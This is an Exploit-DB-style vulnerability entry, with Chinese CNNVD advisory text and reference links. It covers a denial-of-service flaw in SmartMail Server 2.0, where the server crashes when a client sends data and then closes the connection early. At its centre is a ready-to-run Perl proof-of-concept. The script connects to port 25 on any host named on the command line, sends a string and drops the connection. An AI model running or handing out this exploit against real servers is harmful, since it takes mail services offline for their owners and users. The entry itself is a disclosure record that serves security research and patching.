https://www.exploit-db.com/exploits/21972
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-659

SmartMailServer2.0版本存在漏洞。远程攻击者通过发送数据和在所有数据发送完之前关闭连接导致服务拒绝（崩溃）。

source: http://www.securityfocus.com/bid/6074/info

SmartMail Server is reported to be prone to a denial of service when a client is sending data and then closes the connection unexpectedly.

SmartMail Server will need to be restarted to regain normal functionality.

This issue was reported in SmartMail Server 2.0 Interim Build 83. It is not known if other versions are affected.


#!/usr/bin/perl -w
# greetz: marocit and #crack.fr (christal)
# [email protected]
use Socket;
if (not $ARGV[0]) {
        print qq~
                Usage: sm.pl <host>
        ~;
exit;}

$ip=$ARGV[0];
print "SmartMail server 2.0 DoSnn";
print "Sending Exploit Code to host: " . $ip . "nn";
sendexplt("MASSINE");
sub sendexplt {
 my ($pstr)=@_;
        $target= inet_aton($ip) || die("inet_aton
problems");
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')
||0) ||
 die("Socket problemsn");
 if(connect(S,pack "SnA4x8",2,25,$target)){
 select(S);
                $|=1;
 print $pstr;
 sleep 3;
         close(S);
 } else { die("Can't connect...n"); }
}

来源:BID
名称:6074
链接:http://www.securityfocus.com/bid/6074
来源:XF
名称:smartmail-terminate-connection-dos(10533)
链接:http://www.iss.net/security_center/static/10533.php
来源:BUGTRAQ
名称:20021031SmartMailserverDOS
链接:http://archives.neohapsis.com/archives/bugtraq/2002-10/0418.html